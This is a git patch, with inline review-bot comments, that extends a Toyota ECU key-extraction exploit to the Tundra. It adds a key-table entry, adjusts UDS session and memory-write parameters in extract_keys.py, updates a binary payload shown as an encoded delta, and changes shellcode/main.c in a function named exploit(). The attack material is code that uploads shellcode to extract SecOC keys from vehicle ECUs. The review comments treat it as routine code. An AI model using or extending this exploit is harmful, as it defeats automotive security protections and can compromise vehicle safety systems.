From b80d9104a14bdf59d236a6a0de2a4a5c929a9d76 Mon Sep 17 00:00:00 2001
From: Willem Melching
Date: Sun, 13 Jul 2025 23:15:42 +0200
Subject: [PATCH] make it work for the tundra
---
 extract_keys.py | 13 ++++++-------
 payload.bin | Bin 4096 -> 4096 bytes
 shellcode/main.c | 2 +-
 3 files changed, 7 insertions(+), 8 deletions(-)
diff --git a/extract_keys.py b/extract_keys.py
index 1afbd63..04668b6 100755
--- a/extract_keys.py
+++ b/extract_keys.py
@@ -28,6 +28,7 @@
 b'\x018965B4209000\x00\x00\x00\x00': b'\x01!!!!!!!!!!!!!!!!', # 2021 RAV4 Prime
 b'\x018965B4233100\x00\x00\x00\x00': b'\x01!!!!!!!!!!!!!!!!', # 2023 RAV4 Prime
 b'\x018965B4509100\x00\x00\x00\x00': b'\x01!!!!!!!!!!!!!!!!', # 2021 Sienna
+ b'\x048965F3401200\x00\x00\x00\x008A3113402000\x00\x00\x00\x008965F3402200\x00\x00\x00\x008A3213402000\x00\x00\x00\x00': b'\x04!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!',
 }
 KEY_STRUCT_SIZE = 0x20
@@ -61,7 +62,7 @@ def get_secoc_key(key_struct):
 panda = Panda()
 panda.set_safety_mode(CarParams.SafetyModel.elm327)
- uds_client = UdsClient(panda, ADDR, ADDR + 8, BUS, timeout=0.1, response_pending_timeout=0.1)
+ uds_client = UdsClient(panda, ADDR, ADDR + 8, BUS, timeout=0.1, response_pending_timeout=1.0)
 print("Getting application versions...")
@@ -82,8 +83,6 @@ def get_secoc_key(key_struct):
 uds_client.diagnostic_session_control(SESSION_TYPE.PROGRAMMING) # Get bootloader version
- uds_client.diagnostic_session_control(SESSION_TYPE.DEFAULT)
- uds_client.diagnostic_session_control(SESSION_TYPE.EXTENDED_DIAGNOSTIC)
 bl_version = uds_client.read_data_by_identifier(DATA_IDENTIFIER_TYPE.APPLICATION_SOFTWARE_IDENTIFICATION)
 print(" - APPLICATION_SOFTWARE_IDENTIFICATION (bootloader) ", bl_version)
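Review bot: The new Tundra entry is the only row in this table without the trailing comment that names the platform, so the next reader has to decode four part numbers to learn what it covers; give it the same annotation the neighbouring rows carry, e.g. `# Tundra` at the end of the added line. That comment is also the place to say that this key deliberately concatenates four version strings where every other key holds one (the leading `\x04` versus `\x01` looks like a count of versions, but that is inferred — confirm). The dictionary this entry belongs to opens above the hunk.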
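Review bot: `response_pending_timeout=1.0` is a bare number with nothing recording why it grew tenfold from the previous 0.1 s, and because it is set on the shared `uds_client` it now stretches the wait on every request in the session, not only on the ones the Tundra ECU answers slowly. A one-line why-comment above the call would preserve the reason, e.g. `# Tundra ECU holds responsePending much longer than the other platforms` (wording inferred from the commit subject — confirm before committing it). get_secoc_key's body continues outside the hunk.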
@@ -113,7 +112,7 @@ def get_secoc_key(key_struct):
 print("\nPreparing to upload payload...") # Write something to DID 203, not sure why but needed for state machine
- uds_client.write_data_by_identifier(0x203, b"\x00" * 5)
+ uds_client.write_data_by_identifier(0x203, b"\x01\x00\x00\x00\x00") # Write KEY and IV to DID 201/202, prerequisite for request download
 print(" - Write data by identifier 0x201", DID_201_KEY.hex())
@@ -126,7 +125,7 @@ def get_secoc_key(key_struct):
 data = b"\x01" # [1] Format
 data += b"\x46" # [2] 4 size bytes, 6 address bytes
 data += b"\x01" # [3] memoryIdentifier
- data += b"\x00" # [4]
+ data += b"\x01" # [4]
 data += struct.pack('!I', 0xfebf0000) # [5] Address
 data += struct.pack('!I', 0x1000) # [9] Size
@@ -155,7 +154,7 @@ def get_secoc_key(key_struct):
 # [5] 0x0
 # [6] mem addr
 # [10] mem addr
- data = b"\x45\x00"
+ data = b"\x45\x01"
 data += struct.pack('!I', 0xfebf0000)
 data += struct.pack('!I', 0x1000)
@@ -172,7 +171,7 @@ def get_secoc_key(key_struct):
 # [5] 0x0
 # [6] mem addr
 # [10] mem addr
- data = b"\x45\x00"
+ data = b"\x45\x01"
 data += struct.pack('!I', 0xe0000)
 data += struct.pack('!I', 0x8000)
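Review bot: The comment `# Write something to DID 203, not sure why but needed for state machine` is now stale: the payload is no longer an arbitrary run of zero bytes but `b"\x01\x00\x00\x00\x00"`, and its leading 0x01 appears to be the same value the later hunks switch to in the requestDownload and 0x45 records (inferred — confirm). Record what is now known instead of "something", e.g. `# DID 0x203: leading byte must match the 0x01 used in the later memory records; required before requestDownload`. get_secoc_key's body continues outside the hunk.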
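Review bot: The same byte flips from 0x00 to 0x01 in three unrelated-looking places — the `[4]` byte here and the second byte of `b"\x45\x01"` in the hunks at -155 and -172 — with no shared name tying them together, so the next port to another ECU has to rediscover all three. Define it once next to `KEY_STRUCT_SIZE`, e.g. `MEM_BYTE = b"\x01"`, and build the records from it: `data += MEM_BYTE # [4]` and `data = b"\x45" + MEM_BYTE`. The `# [4]` comment should also say what the byte is; given the 0x46 format byte (six address bytes starting at [3]) it looks like the second byte of the address field rather than a second memoryIdentifier, but that is inferred — confirm against the ECU's addressAndLengthFormat before naming the constant for its meaning. get_secoc_key's body continues outside the hunk.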
diff --git a/payload.bin b/payload.bin index 24580bad9973c540319da52f1ec7b2916380542d..fda79ae1d57df498d109f119bea6a4312001d6d1 100644 GIT binary patch delta 4038 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 diff --git a/shellcode/main.c b/shellcode/main.c index ae529de..84237b0 100644 --- a/shellcode/main.c +++ b/shellcode/main.c @@ -12,7 +12,7 @@ void exploit() { int *addr = 0xff200000; while (addr < 0xff208000) { - int i = 0x10; + int i = 0x0A; if ((*(RSCFDnCFDTMSTSp + i) & 0b110) != 0) { continue;